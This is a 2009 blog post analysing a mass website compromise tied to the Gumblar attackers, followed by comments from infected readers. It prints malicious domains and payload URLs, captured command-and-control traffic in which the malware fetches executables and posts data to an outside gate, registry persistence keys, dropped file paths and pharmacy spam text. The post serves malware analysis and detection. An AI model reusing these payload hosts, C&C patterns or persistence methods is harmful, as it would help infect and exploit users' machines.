Nine-Ball = Gumblar Redux? – 40,000 websites compromised
My RSS reader alerted me today to another wave of mass website compromises from Web Sense. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out.
Summary
This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:
Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries
What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.
Details
Information on Websense’s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I’ll probably post another article on these guys shortly.
inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA
This IP hosts many other domains associated with the attack:
sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw
When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com 
After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].
A VM of mine was infected and after loading internet explorer the malware lit up and did it’s thing. I’ve submitted a few files to VT but to be honest I haven’t had to much time to investigate to cover everything.
Binary Downloads, Ads and C&C communication
Interesting notes:
User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1
Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html
#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com] ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%
GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1
Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html
#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.
GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes
Other interesting network traffic
GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache
POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache
s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html
iogeelhchqhogmhgggdccnghdqdk
POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache
CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache
CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html
Files & Reg Keys
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”
C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)
Other notable behavior
The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it’s presence by deleting various reg keys and the winpcap uninstaller.
Hi ANdrew.
I’m Korean malware analzer.
I try to download above url but my dns is not resolv that domain name.
SO would you please send me a copy of the binaries?
Thanks.
Hi, after reading this im absolutely positive that i have this on my computer. It seems to block my anti virus from working.
(I have Trend Micro) You’re website is the only place i’ve found information on this so far. If you could help me in removing it, or direct me somewhere that can it would be greatly appreciated.
i have this virus on my computer and was unable to access certain websites. now whenever i try to open IE 7 to any page, it shows trughtsa.com, sticks there for a while, an adobe error comes up and then the whole program shuts down. how do i get this off of my computer???? please help!!!
Well last time i booted into windows my desktop-background was izohore.bmp and a strange “Anti Virus” Software was scanning some files. So it seems like i have got this thing. The Problem was that i could not Run any App like firefox or taskmanager since the “AV” “detected an infection” So i quickliy shut down my computer and booted into Linux. I mounted the WINDOWS partition and fount strange nubered exe in an stange numbered folder in /all users/Application Data/ and the izohore.bmp in \user\Local Settings\Temp\ but i couldnot find any other file yet. I used ClamAV to scan this partition but it did not even find the exe in the “app data” folder(since it is not the best choice anyway). It seems like this scarware uses varied names to store its data but the server.exe and socks.exe should exist i think and the names do not seem like they varie.
Since the Program doesnot seem to corrupt any random data, im going to reboot into windows and see what i can do there since i have removed ev erything if found concerning this virus. Thank you
I have struggled with this malware all weekend. It’s called Krap.w and seems to be very new. All google hits are just hours old. No antivirus company has any news on it. It reinstalls a three-digit exe file every reboot, like 266.exe in temporary internet files folder, and also a random eight digit folder in user\temp\, eg. user\temp\15736234\ where three files are created: 15736234 15736234.ins and 15736234.exe (same random eight digits). F-secure’s antivirus program now detects and stops it from taking over the system, but does not find the installer yet. Neither have I.